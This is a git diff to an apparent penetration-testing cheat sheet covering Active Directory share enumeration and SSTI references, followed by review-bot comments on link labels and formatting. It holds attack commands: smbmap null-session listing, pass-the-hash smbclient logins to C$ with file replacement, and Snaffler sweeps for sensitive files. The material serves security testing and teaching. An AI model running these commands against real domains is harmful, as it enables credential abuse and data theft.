diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0878006..db4c84f 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -848,7 +848,7 @@ Automated exploitation: > Some shares can be accessible without authentication, explore them to find some juicy files -* [smbmap](https://github.com/ShawnDEvans/smbmap) +* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap) ```powershell smbmap -H 10.10.10.10 # null session smbmap -H 10.10.10.10 -R # recursive listing @@ -856,7 +856,7 @@ Automated exploitation: smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" ``` -* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) +* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) ```powershell pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ @@ -866,7 +866,7 @@ Automated exploitation: put # replace a file ``` -* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) +* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) ```powershell smbclient -I 10.10.10.100 -L ACTIVE -N -U "" Sharename Type Comment 
@@ -896,6 +896,22 @@ Automated exploitation: smb: \> mget * ``` + +* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler) + ```ps1 + snaffler.exe -s - snaffler.log + + # Snaffle all the computers in the domain + ./Snaffler.exe -d domain.local -c -s + + # Snaffle specific computers + ./Snaffler.exe -n computer1,computer2 -s + ​ + # Snaffle a specific directory + ./Snaffler.exe -i C:\ -s + ``` + + ### SCF and URL file attack against writeable share Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) @@ -4032,3 +4048,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) * [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) * [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) +* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d34acdd..12e1575 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -1085,7 +1085,6 @@ layout template: ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) -* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
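Review bot: in the hunk at `@@ -856,7 +856,7 @@` the new link text keeps the existing typo "path-toolkit" while the URL points at `pth-toolkit`; since the point of the change is to put the GitHub owner in front of the name, the text should read `* [pth-smbclient from byt3bl33d3r/pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)` so the label matches the repository it links to.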
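Review bot: in the hunk at `@@ -866,7 +866,7 @@` the label `SecureAuthCorp/smbclient from Impacket` reads as an `owner/repo` path, but `smbclient` is an example script inside the `impacket` repository, not a repository of its own; `* [smbclient.py from SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket)` keeps the owner prefix the rest of the change introduces without suggesting a repository that does not exist.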
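Review bot: the Snaffler block added in the hunk at `@@ -896,6 +896,22 @@` has several copy-paste hazards. The first command `snaffler.exe -s - snaffler.log` passes a bare `-` and a file name with no option in front of it, which looks like a mangled line; either drop it or write out the intended option for the log file. The block also mixes `snaffler.exe` and `./Snaffler.exe`, is fenced as `ps1` while the neighbouring blocks in the same section use `powershell`, and the line between the "specific computers" and "specific directory" examples contains a zero-width space (U+200B) rather than being empty, which renders invisibly but ends up in anything pasted from the page. The two extra blank lines before `### SCF and URL file attack` should also be reduced to one to match the rest of the file.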
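Review bot: the hunk at `@@ -4032,3 +4048,4 @@` adds the RBCD reference without a trailing newline (`\ No newline at end of file`), which the original file did have; add the final newline so the next reference appended to this list does not show up as a spurious change to this line.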
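Review bot: the hunk at `@@ -1085,7 +1085,6 @@` in the SSTI README removes the "Yahoo! RCE via Spring Engine SSTI" reference with no reason given in the change; if the link is dead, an archived copy of the post would preserve the citation rather than dropping it, and if it was removed for another reason that should be stated in the commit message.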